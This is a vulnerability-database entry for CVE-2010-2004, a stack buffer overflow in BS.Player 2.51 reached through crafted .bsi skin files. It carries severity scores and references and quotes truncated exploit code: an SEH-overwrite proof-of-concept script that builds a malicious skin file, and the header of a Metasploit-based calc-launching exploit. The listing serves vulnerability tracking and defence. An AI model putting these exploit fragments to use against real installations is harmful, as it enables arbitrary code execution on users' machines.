Published: 20/05/2010 Updated: 17/08/2017

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 940

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote malicious users to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.

Vulnerable Product	Search on Vulmon	Subscribe to Product
bsplayer bs.player 2.51

# Exploit Title: BSPlayer v251 Universal SEH Overflow Exploit # Date: 15/01/2010 # Author: Dz_attacker # Version: 251 # Tested on: Windows xp sp3 # Code : # Discover : mertsarica # Exploit : Dz_Attacker (dz_attacker@hotmailfr) junk = "[Options]\nSkin=" # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum metasploit ...

# BSPlayer v251 # Software Link: wwwbsplayercom/bsplayer-english/download-freehtml # SEH Overwrite Vulnerability # wwwmertsaricacom junk = "[Options]\nSkin=" vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4 try: vulnerable = open("vulnerablebsi",'w') vulnerablewrite(vulnerability) vulnerableclose() ...

CWE-119 http://www.mertsarica.com/codes/bsplayer_seh_overwrite.py http://secunia.com/advisories/38221 http://www.vupen.com/english/advisories/2010/0148 http://www.mertsarica.com/?p=511 http://www.securityfocus.com/bid/37831 http://www.exploit-db.com/exploits/11154 https://exchange.xforce.ibmcloud.com/vulnerabilities/55708 https://nvd.nist.gov https://www.exploit-db.com/exploits/11154/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2010-2004

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect